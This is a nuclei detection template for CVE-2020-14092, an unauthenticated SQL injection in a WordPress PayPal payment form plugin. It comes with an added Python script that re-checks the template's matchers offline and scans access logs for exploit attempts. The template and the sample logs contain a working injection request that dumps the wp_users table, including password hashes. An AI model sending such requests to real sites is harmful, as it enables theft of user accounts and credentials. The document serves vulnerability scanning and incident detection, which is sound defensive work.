2021-03-10 11:36:11 +00:00
id: CVE-2020-14092

info:
  name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
  author: princechaddha
  severity: critical
  description: The 'query' parameter of the WordPress Payment Form For Paypal Pro plugin lets any unauthenticated user execute arbitrary SQL queries against the site database, with the result set returned in the page body as JSON.
  reference:
    - https://wpscan.com/vulnerability/10287
  tags: cve,cve2020,wordpress,wp-plugin,sqli
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-14092
    cwe-id: CWE-89

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        condition: and
        words:
          - '"user_login"'
          - '"user_email"'
          - '"user_pass"'
          - '"user_activation_key"'

      - type: status
        status:
          - 200
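The template above only says what to send and which response is a hit. As an added example (not part of the nuclei template, the nuclei project, or the plugin), the following Python re-implements the three matchers offline against constructed responses, and adds the complementary defender-side check: scanning a web-server access log for requests that carry the vulnerable `cffaction=get_data_from_database&query=` pair and decoding the SQL that was attempted. The responses and log lines are constructed for illustration; the IP addresses, timestamps and the `admin-ajax.php` variant are assumptions, not observed traffic.

```python
"""Offline re-implementation of the CVE-2020-14092 nuclei matchers plus an
access-log check for exploitation attempts.

Added example; not code from the nuclei template or the plugin.  All sample
responses and log lines below are constructed, not captured from a real site.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Matcher values copied from the template.  matchers-condition: and means all
# three matchers must hold for a response to count as vulnerable.
REQUIRED_HEADER_WORD = "text/html"
REQUIRED_BODY_WORDS = ('"user_login"', '"user_email"', '"user_pass"', '"user_activation_key"')
REQUIRED_STATUS = 200


def matches_template(status: int, headers: dict, body: str) -> bool:
    """Return True when a response satisfies every matcher in the template."""
    # part: header -> substring match over the raw header block.
    header_blob = "\n".join(f"{name}: {value}" for name, value in headers.items())
    header_ok = REQUIRED_HEADER_WORD in header_blob
    # part: body with condition: and -> every quoted column name must appear,
    # which is what a JSON dump of wp_users looks like.
    body_ok = all(word in body for word in REQUIRED_BODY_WORDS)
    status_ok = status == REQUIRED_STATUS
    return header_ok and body_ok and status_ok


# Constructed sample responses (status, headers, body).
VULNERABLE_RESPONSE = (
    200,
    {"Content-Type": "text/html; charset=UTF-8"},
    '[{"ID":"1","user_login":"admin","user_pass":"$P$Bexamplehashexamplehashexamplehas/",'
    '"user_email":"admin@example.invalid","user_activation_key":""}]',
)
# An ordinary front page: 200 and text/html, but no leaked table.
BENIGN_RESPONSE = (200, {"Content-Type": "text/html; charset=UTF-8"}, "<html><body>Welcome</body></html>")
# Only one of the four column names present: condition: and must reject it.
PARTIAL_RESPONSE = (200, {"Content-Type": "text/html"}, '{"user_login":"admin"}')


# Exploitation attempts leave both parameters in the request line of the
# access log, whatever path they are sent to, so the check keys on the query
# string rather than on the path used by the template.
REQUEST_LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def find_exploit_attempts(log_lines):
    """Return (client_ip, decoded SQL) for each log line carrying the vulnerable action.

    parse_qs percent-decodes the query parameter, so an encoded
    'SELECT%20*%20from%20wp_users' is reported as readable SQL.  Nothing is executed.
    """
    hits = []
    for line in log_lines:
        match = REQUEST_LINE_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group("target")).query, keep_blank_values=True)
        if params.get("cffaction") == ["get_data_from_database"] and "query" in params:
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, params["query"][0]))
    return hits


# Constructed combined-log-format lines (IPs from documentation ranges).
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [10/Mar/2021:11:36:11 +0000] "GET /?cffaction=get_data_from_database'
    '&query=SELECT%20*%20from%20wp_users HTTP/1.1" 200 1844 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2021:11:40:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Mar/2021:11:41:15 +0000] "POST /wp-admin/admin-ajax.php?cffaction='
    'get_data_from_database&query=SELECT+option_value+FROM+wp_options+WHERE+option_name%3D%27siteurl%27'
    ' HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    print("vulnerable sample matches:", matches_template(*VULNERABLE_RESPONSE))
    print("benign sample matches:", matches_template(*BENIGN_RESPONSE))
    for ip, sql in find_exploit_attempts(SAMPLE_ACCESS_LOG):
        print(f"exploit attempt from {ip}: {sql}")
```

Two caveats follow from the template itself. The request hardcodes `wp_users`, so a site with a non-default table prefix is not detected even though the injection point is identical; a scanner run against such a site gets a 200 text/html response without the four column names and the template correctly stays silent. And the body matcher requires all four quoted column names, which keeps a page that merely mentions `user_login` from producing a false positive; the log check, by contrast, flags every attempt regardless of whether it succeeded, which is the behaviour a responder wants.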